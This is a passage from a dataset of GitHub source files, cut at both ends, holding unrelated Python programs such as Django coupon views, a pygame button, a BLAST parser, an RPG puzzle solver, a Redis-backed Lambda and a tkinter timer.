views.py\n@login_required(login_url='authentification:login')\ndef add_coupon(request):\n if request.method == 'POST':\n title = request.POST['title']\n code = request.POST['code']\n discount_amount = request.POST['discount_amount']\n\n coupon = Coupon(user=request.user, code=code, discount_amount=discount_amount, title=title)\n coupon.save()\n\n return redirect('dashboard:manager-dashboard')\n\n return render(request, 'dashboard/manager/add-coupon.html')\n\n\n# views.py\n@login_required(login_url='authentification:login')\ndef edit_coupon(request):\n # Retrieve coupons for the current user\n coupons = Coupon.objects.filter(user=request.user)\n\n if request.method == 'POST':\n coupon_id = request.POST['coupon']\n code = request.POST['code']\n discount_amount = request.POST['discount_amount']\n\n coupon = Coupon.objects.get(id=coupon_id)\n coupon.code = code\n coupon.discount_amount = discount_amount\n coupon.save()\n\n return redirect('dashboard:manager-dashboard')\n\n context = {'coupons': coupons}\n return render(request, 'dashboard/manager/edit-coupon.html', context)\n","repo_name":"portmaler/event-ticket-reservation","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"13606606184","text":"import pygame\r\nimport os\r\nfrom time import *\r\nimport random\r\nimport files.variables as variables\r\n\r\nclass Button(pygame.sprite.Sprite):\r\n def __init__(\r\n self, \r\n image_path,\r\n #key,\r\n do_function,\r\n x_position,\r\n y_position,\r\n width = 400, \r\n height = 60\r\n ) -> None:\r\n super().__init__()\r\n self.do_function = do_function\r\n #self.key = key\r\n self.image_path = image_path\r\n self.width = width\r\n self.height = height\r\n self.x_position = x_position\r\n self.y_position = y_position\r\n self.sprites = []\r\n self.clicked = False\r\n # images:\r\n self.sprites.append(pygame.image.load(os.path.join('Assets',image_path))) #.convert())#convert function can lead to transparency issues.\r\n self.image_index = 0\r\n self.image = pygame.transform.scale(self.sprites[self.image_index],(self.width, self.height))\r\n self.rect = self.image.get_rect()\r\n self.rect.topleft = (self.x_position, self.y_position) #sprite position\r\n #self.can_set_function_int = True\r\n #self.randnum = random.randint(888,9999)\r\n \r\n def update(self) -> None:\r\n if variables.show_menu:\r\n pos = pygame.mouse.get_pos()\r\n if self.rect.collidepoint(pos):\r\n if pygame.mouse.get_pressed()[0]==1 and self.clicked == False:\r\n self.clicked = True\r\n #print(\"button clicked\")\r\n variables.function_int = self.do_function \r\n if pygame.mouse.get_pressed()[0]==0:\r\n self.clicked = False\r\n #if passed_key == self.key:\r\n # self.do_function #pass #here do the action needed\r\n ","repo_name":"susda/IronFly","sub_path":"files/buttons_class.py","file_name":"buttons_class.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"1424674881","text":"#!/usr/bin/env python3\n\nimport argparse\nimport csv\nimport sys\nimport os\n#from collections import defaultdict\n\n# --------------------------------------------------\ndef get_args():\n\n parser = argparse.ArgumentParser(description='Parse BLAST tab')\n parser.add_argument('-p', '--pct_id', help='Percent identity',\n metavar='float', type=float, default=0)\n parser.add_argument('-e', '--evalue', help='E value float',\n metavar='float', type=float, default=None)\n parser.add_argument('file', metavar='file', help='BLAST tab output')\n return parser.parse_args()\n\n# --------------------------------------------------\ndef main():\n args = get_args()\n p = args.pct_id\n e = args.evalue\n file = args.file\n\n if not os.path.isfile(file):\n print('\"{}\" is not a file'.format(file))\n sys.exit(1)\n\n field = ['qseqid', 'sseqid', 'pident', 'length', 'mismatch', 'gapopen', 'qstart', \n 'qend' 'sstart', 'send', 'bitscore', 'evalue']\n\n for line in open(file):\n d = dict(zip(field, line.split('\\t')))\n row = [d['qseqid'], d['sseqid'], d['pident'], d['evalue']]\n\n if e is not None and e >= float(d['evalue']) and float(d['pident']) >= p:\n print('\\t'.join(row))\n elif e is None and float(d['pident']) >= p:\n print('\\t'.join(row))\n\n \n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","repo_name":"en3ri/abe487","sub_path":"problems/parse-blast/parse_blast_tab.py","file_name":"parse_blast_tab.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"42600895003","text":"#!/usr/bin/env python\nfrom ecmwfapi import ECMWFDataServer\nserver = ECMWFDataServer()\nfor yr in range(2009,2010) :\n server.retrieve({\n \"class\": \"ei\",\n \"dataset\": \"interim\",\n \"date\": \"%.4d-01-01/to/%.4d-12-31\" % (yr,yr),\n \"expver\": \"1\",\n \"grid\": \"1./1.\",\n \"levtype\": \"sfc\",\n \"param\": \"165.128/166.128\",\n \"step\": \"0\",\n \"stream\": \"oper\",\n \"time\": \"00:00:00/06:00:00/12:00:00/18:00:00\",\n \"type\": \"an\",\n \"target\": \"erain.w10.%.4d.1deg.nc\" % (yr),\n \"format\": \"netcdf\"\n })\n","repo_name":"irudeva/FWND_erain_1deg","sub_path":"get.erain.py","file_name":"get.erain.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"2211518710","text":"import logging\nfrom typing import Any, Dict, Iterator, Optional\nimport urllib.parse\n\n\nfrom simple_ado.base_client import ADOBaseClient\nfrom simple_ado.http_client import ADOHTTPClient, ADOResponse\n\n\nclass ADOEndpointsClient(ADOBaseClient):\n \"\"\"Wrapper class around the ADO service endpoints APIs.\n\n :param http_client: The HTTP client to use for the client\n :param log: The logger to use\n \"\"\"\n\n def __init__(self, http_client: ADOHTTPClient, log: logging.Logger) -> None:\n super().__init__(http_client, log.getChild(\"endpoints\"))\n\n def get_endpoints(self, project_id: str, *, endpoint_type: Optional[str] = None) -> ADOResponse:\n \"\"\"Gets the service endpoints.\n\n :param project_id: The identifier for the project\n :param endpoint_type: The type to filter down to.\n\n :returns: The ADO response with the data in it\n \"\"\"\n request_url = (\n self.http_client.api_endpoint(project_id=project_id) + \"/serviceendpoint/endpoints?\"\n )\n\n parameters = {\"api-version\": \"6.0-preview.4\"}\n\n if endpoint_type:\n parameters[\"type\"] = endpoint_type\n\n request_url += urllib.parse.urlencode(parameters)\n\n response = self.http_client.get(request_url)\n response_data = self.http_client.decode_response(response)\n return self.http_client.extract_value(response_data)\n\n def get_usage_history(\n self, *, project_id: str, endpoint_id: str, top: Optional[int] = None\n ) -> Iterator[Dict[str, Any]]:\n \"\"\"Gets the usage history for an endpoint.\n\n :param project_id: The identifier for the project\n :param endpoint_id: The endpoint to get the history for\n :param top: If set, get this number of results\n\n :returns: The ADO response with the data in it\n \"\"\"\n request_url = (\n self.http_client.api_endpoint(project_id=project_id)\n + f\"/serviceendpoint/{endpoint_id}/executionhistory?\"\n )\n\n parameters: Dict[str, Any] = {\"api-version\": \"6.0-preview.1\"}\n\n if not top or top < 50:\n parameters[\"top\"] = top\n else:\n parameters[\"top\"] = 50\n\n request_url += urllib.parse.urlencode(parameters)\n\n url = request_url\n\n returned = 0\n\n while True:\n response = self.http_client.get(url)\n decoded = self.http_client.decode_response(response)\n for use in decoded[\"value\"]:\n yield use\n returned += 1\n\n if top and returned >= top:\n return\n\n if \"X-MS-ContinuationToken\" not in response.headers:\n return\n\n continuation_token = response.headers[\"X-MS-ContinuationToken\"]\n url = request_url + f\"&continuationToken={continuation_token}\"\n","repo_name":"microsoft/simple_ado","sub_path":"simple_ado/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"91"} +{"seq_id":"23595071149","text":"from uuid import uuid4\n\nfrom elasticapm.contrib.starlette import make_apm_client, ElasticAPM\nfrom fastapi import FastAPI, Request\n\nfrom src.endpoints import health_check\nfrom src.endpoints.v1 import utters\nfrom src.settings import BASE_PATH, ELASTIC_APM, ENABLE_MONITORING\nfrom src.database.connection import database\n\napp = FastAPI()\n\nif ENABLE_MONITORING:\n app.add_middleware(ElasticAPM, client=make_apm_client(ELASTIC_APM))\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\n@app.middleware(\"http\")\nasync def default_handler(request: Request, call_next):\n request.state.transaction_id = str(uuid4())\n response = await call_next(request)\n return response\n\napp.include_router(\n health_check.router,\n prefix=f\"{BASE_PATH}\",\n tags=[\"health\"],\n responses={404: {\"description\": \"Not found\"}},\n)\n\napp.include_router(\n utters.router,\n prefix=f\"{BASE_PATH}\",\n tags=[\"utters\"],\n responses={404: {\"description\": \"Not found\"}},\n)\n","repo_name":"danielhs1/rasa_resposes","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"} +{"seq_id":"15309860307","text":"# --- Day 21: RPG Simulator 20XX ---\n# Little Henry Case got a new video game for Christmas. It's an RPG, and he's stuck on a boss.\n# He needs to know what equipment to buy at the shop. He hands you the controller.\n#\n# In this game, the player (you) and the enemy (the boss) take turns attacking. The player always goes first. Each\n# attack reduces the opponent's hit points by at least 1. The first character at or below 0 hit points loses.\n#\n# Damage dealt by an attacker each turn is equal to the attacker's damage score minus the defender's armor score. An\n# attacker always does at least 1 damage. So, if the attacker has a damage score of 8, and the defender has an armor\n# score of 3, the defender loses 5 hit points. If the defender had an armor score of 300, the defender would still\n# lose 1 hit point.\n#\n# Your damage score and armor score both start at zero. They can be increased by buying items in exchange for gold.\n# You start with no items and have as much gold as you need. Your total damage or armor is equal to the sum of those\n# stats from all of your items. You have 100 hit points.\n#\n# Here is what the item shop is selling:\n#\n# Weapons: Cost Damage Armor\n# Dagger 8 4 0\n# Shortsword 10 5 0\n# Warhammer 25 6 0\n# Longsword 40 7 0\n# Greataxe 74 8 0\n#\n# Armor: Cost Damage Armor\n# Leather 13 0 1\n# Chainmail 31 0 2\n# Splintmail 53 0 3\n# Bandedmail 75 0 4\n# Platemail 102 0 5\n#\n# Rings: Cost Damage Armor\n# Damage +1 25 1 0\n# Damage +2 50 2 0\n# Damage +3 100 3 0\n# Defense +1 20 0 1\n# Defense +2 40 0 2\n# Defense +3 80 0 3\n\n# You must buy exactly one weapon; no dual-wielding. Armor is optional, but you can't use more than one. You can buy\n# 0-2 rings (at most one for each hand). You must use any items you buy. The shop only has one of each item,\n# so you can't buy, for example, two rings of Damage +3.\n#\n# For example, suppose you have 8 hit points, 5 damage, and 5 armor, and that the boss has 12 hit points, 7 damage,\n# and 2 armor:\n#\n# The player deals 5-2 = 3 damage; the boss goes down to 9 hit points.\n# The boss deals 7-5 = 2 damage; the player goes down to 6 hit points.\n# The player deals 5-2 = 3 damage; the boss goes down to 6 hit points.\n# The boss deals 7-5 = 2 damage; the player goes down to 4 hit points.\n# The player deals 5-2 = 3 damage; the boss goes down to 3 hit points.\n# The boss deals 7-5 = 2 damage; the player goes down to 2 hit points.\n# The player deals 5-2 = 3 damage; the boss goes down to 0 hit points.\n# In this scenario, the player wins! (Barely.)\n#\n# You have 100 hit points. The boss's actual stats are in your puzzle input. What is the least amount of gold you can\n# spend and still win the fight?\n\n\nfrom itertools import combinations, count\n\n# constants\nWEAPONS = {\n 'Dagger': {\n 'cost': 8, 'damage': 4, 'armor': 0\n },\n 'Shortsword': {\n 'cost': 10, 'damage': 5, 'armor': 0\n },\n 'Warhammer': {\n 'cost': 25, 'damage': 6, 'armor': 0\n },\n 'Longsword': {\n 'cost': 40, 'damage': 7, 'armor': 0\n },\n 'Greataxe': {\n 'cost': 74, 'damage': 8, 'armor': 0\n }\n}\n\n# all armor with additional 'None' Armor for convenience\nARMOR = {\n 'Leather': {\n 'cost': 13, 'damage': 0, 'armor': 1\n },\n 'Chainmail': {\n 'cost': 31, 'damage': 0, 'armor': 2\n },\n 'Splintmail': {\n 'cost': 53, 'damage': 0, 'armor': 3\n },\n 'Bandedmail': {\n 'cost': 75, 'damage': 0, 'armor': 4\n },\n 'Platemail': {\n 'cost': 102, 'damage': 0, 'armor': 5\n },\n 'Bare': {\n 'cost': 0, 'damage': 0, 'armor': 0\n }\n}\n\nRINGS = {\n 'Damage +1': {\n 'cost': 25, 'damage': 1, 'armor': 0\n },\n 'Damage +2': {\n 'cost': 50, 'damage': 2, 'armor': 0\n },\n 'Damage +3': {\n 'cost': 100, 'damage': 3, 'armor': 0\n },\n 'Defense +1': {\n 'cost': 20, 'damage': 0, 'armor': 1\n },\n 'Defense +2': {\n 'cost': 40, 'damage': 0, 'armor': 2\n },\n 'Defense +3': {\n 'cost': 80, 'damage': 0, 'armor': 3\n }\n}\n\n# boss input here\nBOSS = {\n 'damage': 8,\n 'armor': 2,\n 'hp': 100,\n}\n\n\ndef game_handler() -> int:\n # Play all possible games with 1 weapon, 0 or 1 armor, <0-2> rings. Pick cheapest winning set of items.\n cheapest = float(\"inf\")\n for weapon in WEAPONS.keys():\n for armor in ARMOR.keys():\n # rings (min 0, max 2)\n for i in range(0, 3):\n for rings_set in combinations(RINGS.keys(), i):\n # calculate current hero stats\n current_attack = WEAPONS[weapon]['damage'] + sum(RINGS[ring]['damage'] for ring in rings_set)\n current_armor = ARMOR[armor]['armor'] + sum(RINGS[ring]['armor'] for ring in rings_set)\n current_cost = WEAPONS[weapon]['cost'] + ARMOR[armor]['cost'] + sum(RINGS[ring]['cost'] for ring\n in rings_set)\n # simulate fight - if boss is defeated, check current items set total price\n if simulate_fight_boss(current_attack, current_armor, 100):\n cheapest = min(cheapest, current_cost)\n\n return cheapest\n\n\ndef simulate_fight_boss(attack: int, armor: int, hp: int) -> bool:\n # initial fight information\n player_stats = {\n 'damage': attack,\n 'armor': armor,\n 'hp': hp,\n }\n boss_stats = BOSS.copy()\n\n # simulate fight\n for game_round in count(0):\n # even - players turn, odd - boss turn (min 1 dmg)\n if game_round % 2 == 0:\n boss_stats['hp'] -= (player_stats['damage'] - boss_stats['armor']) or 1\n else:\n player_stats['hp'] -= (boss_stats['damage'] - player_stats['armor']) or 1\n\n # check if someone lost\n if boss_stats['hp'] <= 0: # fight won, return True\n return True\n if player_stats['hp'] <= 0: # fight lost, return False\n return False\n\n\nif __name__ == '__main__':\n result = game_handler()\n print(f\"Lowest cost to defeat boss: {result}\")\n","repo_name":"kamilczerwinski22/Advent-of-Code","sub_path":"main_files/year_2015/day_21/year2015_day21_part1.py","file_name":"year2015_day21_part1.py","file_ext":"py","file_size_in_byte":6285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"8186121768","text":"class Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n zeroIndex = 0\n for i in range(len(nums)):\n current = nums[i]\n if current != 0:\n nums[zeroIndex] = nums[i]\n if i != zeroIndex:\n nums[i] = 0\n zeroIndex += 1\n","repo_name":"youwithouto/leetcode-practice","sub_path":"week03/2020-12-15/delayed-init/283.move-zeros.py","file_name":"283.move-zeros.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"3167025540","text":"# Execute a hyperparameter grid search,\n# to tune the hyperparamters of both the supervised and unsupervised models.\n# Steps:\n# – for each hyperparameter, choose a few values of that hyperparameter that you want to experiment with.\n# - find all combinations of the hyperparameters [one value per hyperparameter]\n# - run the unsupervised and supervised models with each combination\n# - get the corresponding f1 score and add it to a big spreadsheet (to then examine later).\n\nfrom fasttext import *\nimport itertools\n\nSETTINGS = \"./settings\"\nCBOW_MASTER_SETTINGS_FILE = os.path.abspath(os.path.join(SETTINGS, 'cbow_master_settings.txt'))\nSKIPGRAM_MASTER_SETTINGS_FILE = os.path.abspath(os.path.join(SETTINGS, 'skipgram_master_settings.txt'))\nSCRATCH_VECTORIZE = \"../scratch-vectorize/\"\n\n# UNSUPERVISED HYPERPARAMETERS\nMODEL_TYPE = ['model_type: cbow', 'model_type: skipgram']\nMINCOUNT_UNSUPERVISED = [\"minCount: 1\", \"minCount: 5\"]\nDIM = [\"dim: 50\", \"dim: 64\", \"dim: 128\", \"dim: 175\", \"dim: 200\"]\nMINN_MAXNN = [(\"minn: 1\", \"maxn: 5\"), (\"minn: 1\", \"maxn: 8\"), (\"minn: 1\", \"maxn: 10\")]\nEPOCH_LR_UNSUPERVISED = [(\"epoch: 5\", \"lr: 0.1\"), (\"epoch: 10\", \"lr: 0.05\"), (\"epoch: 25\", \"lr: 0.01\"), (\"epoch: 50\", \"lr: 0.01\")]\n\n\n# SUPERVISED HYPERPARAMETERS\nMINCOUNT_SUPERVISED = [1, 5]\nEPOCH_LR_SUPERVISED = [(5, 0.1), (10, 0.1), (25, 0.05), (50, 0.05)]\nWORD_NGRAMS = [1, 5, 10] # how many ngrams to look surrounding the current word\n\ndef get_combinations(hyperparameters):\n \"\"\"\n Takes in all possible options for each hyperparameter, and returns all possible combinations between them.\n\n inputs:\n - hyperparamters: a list of lists, where each list corresponds to a certain hyperparameter and\n contains the different options for that hyperparameter.\n\n returns: a list of all possible combinations of the different hyperparameters (which a specific value for each hyperparameter)\n \"\"\"\n return list(itertools.product(*hyperparameters))\n\ndef add_hyperparameter(hyperparameter_string, hyperparamters_dictionary):\n \"\"\"\n Takes in hyperparameter_string in the form of \"hyperparameter_name: hyperparameter_value\",\n and parses that, and adds it appropriately to hyperparamters_dictionary.\n\n inputs:\n - hyperparameter_string: in the form: \"hyperparameter_name: hyperparameter_value\"\n - hyperparamters_dictionary: the dictionary to add the hyperparameter to.\n returns:\n the dictionary after adding that hyperparameter\n \"\"\"\n # split the string\n split_hyperparameter_string = hyperparameter_string.split(\":\")\n hyperparameter_name = split_hyperparameter_string[0]\n hyperparameter_value = split_hyperparameter_string[1].strip()\n hyperparamters_dictionary[hyperparameter_name] = hyperparameter_value\n return \"success\"\n\ndef get_write_string(dictionary, count, type=\"cbow\"):\n to_write = \"\"\n to_write += \"#### COMBINATION \" + str(count) + \" ####\\n\"\n\n # iterate through all the keys in this dictionary\n # and add them along with their values to the values to be written to file\n for key, value in dictionary.items():\n to_write += key + \": \" + value + \"\\n\"\n\n # append the following to the arguments:\n # - type: unsupervised\n # - input: dataset/train_500000.txt\n # - output: word_vectors/cbow_combination_\n to_write += \"type: unsupervised\\n\"\n to_write += \"input: \" + SCRATCH_VECTORIZE + \"dataset/train_500000.txt\\n\"\n to_write += \"output: \" + SCRATCH_VECTORIZE + \"word_vectors/\" + type + \"_combination_\" + str(count) + \"\\n\"\n\n # add another newline to differentiate between combinations\n to_write += \"\\n\"\n return to_write\n\nif __name__ == \"__main__\":\n UNSUPERVISED_HYPERPARAMETERS = []\n UNSUPERVISED_HYPERPARAMETERS.extend([MODEL_TYPE, MINCOUNT_UNSUPERVISED, DIM, MINN_MAXNN, EPOCH_LR_UNSUPERVISED])\n print(\"unupervised hyperparamters master list:\", UNSUPERVISED_HYPERPARAMETERS)\n combinations = get_combinations(UNSUPERVISED_HYPERPARAMETERS)\n print(\"\\n\")\n\n # create a dictionary of args corresponding to each combination of hyperparamters\n # { model_type: skipgram\n # input_target: dataset/train_1000.txt\n # minCount: 5\n # dim: 128\n # minn: 3\n # maxn: 6\n # epoch: 5\n # lr: 0.05\n # output_target: word_vectors/train_1000 }\n\n dictionaries = []\n for i in range(len(combinations)):\n combination = combinations[i]\n # print(combination)\n hyperparamters_dictionary = {}\n for element in combination:\n # element is either a string (hyperparameter) or a tuple (combination of two hyperparamters, whose values are linked)\n if type(element) == str:\n add_hyperparameter(element, hyperparamters_dictionary)\n # # split the string\n # split_element = element.split(\":\")\n # hyperparameter_name = split_element[0]\n # hyperparameter_value = split_element[1].strip()\n # hyperparamters_dictionary[hyperparameter_name] = hyperparameter_value\n if type(element) == tuple:\n # split each element in tuple\n # add that hyperparameter to hyperparamters_dictionary\n for hyperparameter_string in element:\n add_hyperparameter(hyperparameter_string, hyperparamters_dictionary)\n\n print(hyperparamters_dictionary)\n dictionaries.append(hyperparamters_dictionary)\n print(\"\\n\")\n print(\"number of combinations: \", len(dictionaries))\n\n # write all cbow combinations into a single txt file\n # and all skipgram combinations into a single txt file\n to_write_cbow = \"\"\n to_write_skipgram = \"\"\n cbow_count = 0\n skipgram_count = 0\n for dictionary in dictionaries:\n if dictionary['model_type'] == \"cbow\":\n cbow_count += 1\n to_write_cbow += get_write_string(dictionary, cbow_count, type=\"cbow\")\n\n elif dictionary['model_type'] == \"skipgram\":\n skipgram_count += 1\n to_write_skipgram += get_write_string(dictionary, skipgram_count, type=\"skipgram\")\n\n with open(CBOW_MASTER_SETTINGS_FILE, \"w+\") as file:\n file.write(to_write_cbow)\n\n with open(SKIPGRAM_MASTER_SETTINGS_FILE, \"w+\") as file:\n file.write(to_write_skipgram)\n","repo_name":"labdalla/scratch-recommend","sub_path":"utilities/hyperparameter_grid_search.py","file_name":"hyperparameter_grid_search.py","file_ext":"py","file_size_in_byte":6313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"4802957102","text":"\nimport torch\nimport itertools\nimport numpy as np\n\nfrom dlengine import comm\nfrom dlengine.evaluator import DatasetEvaluator\n\n\nclass ClassificationEvaluator(DatasetEvaluator):\n def __init__(self, distributed=True, classes=None):\n self._preds = []\n self._gts = []\n self._distributed = distributed\n self._classes = classes\n self._report = \"\"\n self._report_dict = {}\n\n def reset(self):\n self._preds = []\n self._gts = []\n\n def process(self, inputs, outputs: torch.Tensor):\n _, labels = inputs\n _, preds = torch.max(outputs, 1)\n labels = labels.cpu().detach().numpy().tolist()\n preds = preds.cpu().detach().numpy().tolist()\n self._preds.extend(preds)\n self._gts.extend(labels)\n\n def evaluate(self):\n if self._distributed:\n comm.synchronize()\n preds = comm.gather(self._preds, dst=0)\n preds = list(itertools.chain(*preds))\n\n gts = comm.gather(self._gts, dst=0)\n gts = list(itertools.chain(*gts))\n\n if not comm.is_main_process():\n return {}\n else:\n preds = self._preds\n gts = self._gts\n\n if len(preds) == 0:\n print(\"[ClassificationEvaluator] Did not receive valid predictions.\")\n return {}\n p = (np.asarray(gts) == np.asarray(preds)).sum() * 1.0 / len(gts)\n return {\n \"precision\": p\n }\n\n","repo_name":"shellhue/dlengine","sub_path":"demo/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"14184081851","text":"import streamlit as st\nfrom Home import face_rec\n\n# st.set_page_config(page_title=\"Reporting\")\nst.subheader(\"Report\")\n\n# extract data from redis\nname = 'attendance:logs'\ndef load_logs(name, end=-1):\n data = face_rec.r.lrange(name, 0, end)\n data = [x.decode('utf-8') for x in data]\n return data\n\n# tabs to show the information\ntab1, tab2 = st.tabs(['Registered Data', 'Attendace Logs'])\n\nwith tab1:\n if st.button('Refresh Data'):\n with st.spinner(\"Retriving data from Redis\"):\n redis_face_db = face_rec.retrive_data(name=\"academy:register\")\n # st.dataframe(redis_face_db)\n st.dataframe(redis_face_db[['name', 'role']])\n\nwith tab2:\n if st.button('Refresh Logs'):\n st.write(load_logs(name))","repo_name":"alokacomputing/aloka-vision","sub_path":"app/pages/Report.py","file_name":"Report.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"11936371819","text":"from redis import Redis\nimport json\nimport boto3\nimport os\n\nresponse_headers = {\n \"Access-Control-Allow-Headers\": \"*\",\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"POST\",\n }\nlambda_client = boto3.client(\"lambda\")\n\ndef get_credentials():\n '''\n Invokes the GetSecrets functions to fetch database credentials\n '''\n response = lambda_client.invoke(\n FunctionName=os.environ[\"GET_SECRET_ARN\"],\n InvocationType=\"RequestResponse\",\n Payload=json.dumps({\"secret_type\": \"Redis Credentials\"}),\n )\n payload = json.load(response[\"Payload\"])\n if \"error\" in payload:\n return payload\n else:\n credentials = payload[\"credentials\"]\n return credentials\n\ndef lambda_handler(event, context):\n '''\n Gets the user input & returns array of all zipcodes matching user input\n '''\n credentials = get_credentials()\n if not \"error\" in credentials:\n redis_user = credentials[\"username\"]\n redis_password = credentials[\"password\"]\n redis_client = Redis(host=os.environ[\"EC_CLUSTER_ENDPOINT\"],\n port=6379, decode_responses=True, ssl=True,\n username=redis_user, password=redis_password)\n \n input = event[\"queryStringParameters\"].get(\"input\",\"\") if \"queryStringParameters\" in event and event[\"queryStringParameters\"] != None else \"\"\n output = []\n d_cities = []\n\n if input:\n match_str = str(input) + \"*\"\n for k in redis_client.keys(match_str):\n \n data = redis_client.hgetall(k)\n output.append(data)\n \n #get zipcode data by default city type D\n d_cities = [dt for dt in output if dt['CityType'] == 'D']\n zip_data = d_cities if d_cities else output\n \n return {\n \"statusCode\" : 200,\n \"headers\" : response_headers,\n \"body\" : json.dumps({\n \"msg\" : \"Data Fetched Successfully...\",\n \"zip_data\" : zip_data\n }),\n \"isBase64Encoded\": False,\n }\n else:\n return credentials","repo_name":"RushikeshPtl/gatekeeper-terraform","sub_path":"src/dashboard_functions/get_zip_data/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"24965351769","text":"from pprint import pprint\nfrom collections import deque\n\n# use hash table to store graph: key for each node, value is a list of adjacent nodes\n# use queue to store the nodes to match against\n# use a list to store all the nodes that already checked (avoid infinite loop)\n# 1. begin with the start node(current node)\n# 2. enqueue all the nodes that are adjacent with current node\n# 3. pop first node from queue and compare it with target node\n# 4. if matched then return\n# 5. if not append current node the the list of searched nodes\n# 6. goto step 2\n\n\ndef graph_bfs(start, end, g):\n search_queue = deque()\n search_queue += g[start]\n searched = []\n step = 0\n while search_queue:\n person = search_queue.popleft()\n print(\"-\" * step + \"> %s\" % person)\n step += 1\n if person not in searched: # skip searched people to avoid infinite loop\n if person == end:\n print(\"found %s\" % person)\n return True\n else:\n searched.append(person)\n search_queue += g[person]\n return False\n\n\ngraph = {\"you\": [\"alice\", \"bob\", \"claire\"],\n \"bob\": [\"anuj\", \"peggy\"],\n \"alice\": [\"peggy\"],\n \"claire\": [\"thom\", \"jonny\"],\n \"anuj\": [],\n \"peggy\": [],\n \"thom\": [],\n \"jonny\": []}\n\nif __name__ == '__main__':\n pprint(graph)\n graph_bfs(\"you\", \"thom\", graph)\n print(\"-\" * 10)\n graph_bfs(\"you\", \"anuj\", graph)\n print(\"-\" * 10)\n graph_bfs(\"you\", \"jonny\", graph)\n print(\"-\" * 10)\n graph_bfs(\"you\", \"\", graph)\n\n","repo_name":"sunmeng90/datastructure-algorithm-py","sub_path":"dsa/graph_bfs.py","file_name":"graph_bfs.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"19181222309","text":"from tkinter import *\r\nimport time\r\nfrom tkinter import messagebox\r\n\r\n\r\ndef start():\r\n total_time = (int(hrs_var.get()) * 3600) + (int(min_var.get()) * 60) + int(sec_var.get())\r\n while total_time > -1:\r\n mins, secs = divmod(total_time, 60)\r\n hours = 0\r\n if mins > 60:\r\n hours, mins = divmod(mins, 60)\r\n\r\n text_label['text'] = \"{:02d}:{:02d}:{:02d}\".format(hours, mins, secs)\r\n\r\n root.update()\r\n time.sleep(1)\r\n\r\n if total_time == 0:\r\n messagebox.showinfo(\"python Timer\", \"Time is up \")\r\n\r\n total_time -= 1\r\n\r\n\r\nroot = Tk()\r\nroot.title(\"python Timer\")\r\nroot.geometry(\"250x100\")\r\nroot.resizable(False, False)\r\n\r\n\r\ntext_label = Label(root, text=\"Select time for countdown\")\r\ntext_label.grid(column=3, columnspan=5)\r\n\r\nhrs_list = list(range(0, 24))\r\nmin_list = list(range(0, 60))\r\nsec_list = list(range(0, 60))\r\n\r\nhrs_var = StringVar()\r\nhrs_var.set(\"0\")\r\nmin_var = StringVar()\r\nmin_var.set(\"0\")\r\nsec_var = StringVar()\r\nsec_var.set(\"0\")\r\n\r\nhrs_label = Label(root, text=\"Hrs\").grid(row=1, column=2)\r\nmin_label = Label(root, text=\"Min\").grid(row=1, column=4)\r\nsec_label = Label(root, text=\"Sec\").grid(row=1, column=6)\r\nempty = Label(root, text=\"\").grid(row=2)\r\n\r\nhrs_menu = OptionMenu(root, hrs_var, *hrs_list).grid(row=1, column=3)\r\nmin_menu = OptionMenu(root, min_var, *min_list).grid(row=1, column=5)\r\nsec_menu = OptionMenu(root, sec_var, *sec_list).grid(row=1, column=7)\r\n\r\nbtn_start = Button(root, text=\"Start\", command=start, width=5).grid(row=3, column=5)\r\n\r\nroot.mainloop()\r\n","repo_name":"aonuferco/testing-waters-in-python","sub_path":"countdownt.py","file_name":"countdownt.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"40477207258","text":"tcs = int(input())\n\ndef solve(comp, econ):\n sc = sum(comp)\n ac = sc / len(comp)\n se = sum(econ)\n ae = se / len(econ)\n\n \n res = 0\n for c in comp:\n #print(\"new csci average\", (sc - c) / (len(comp) - 1))\n #print(\"new econ average\", (se + c) / (len(econ) + 1))\n if (sc - c) / (len(comp) - 1) <= ac:\n continue\n if (se + c) / (len(econ) + 1) <= ae:\n continue\n res += 1\n return res\n\nfor _ in range(tcs):\n _ = input()\n _ = input()\n comp = list(map(int, input().split(\" \")))\n econ = list(map(int, input().split(\" \")))\n print(solve(comp, 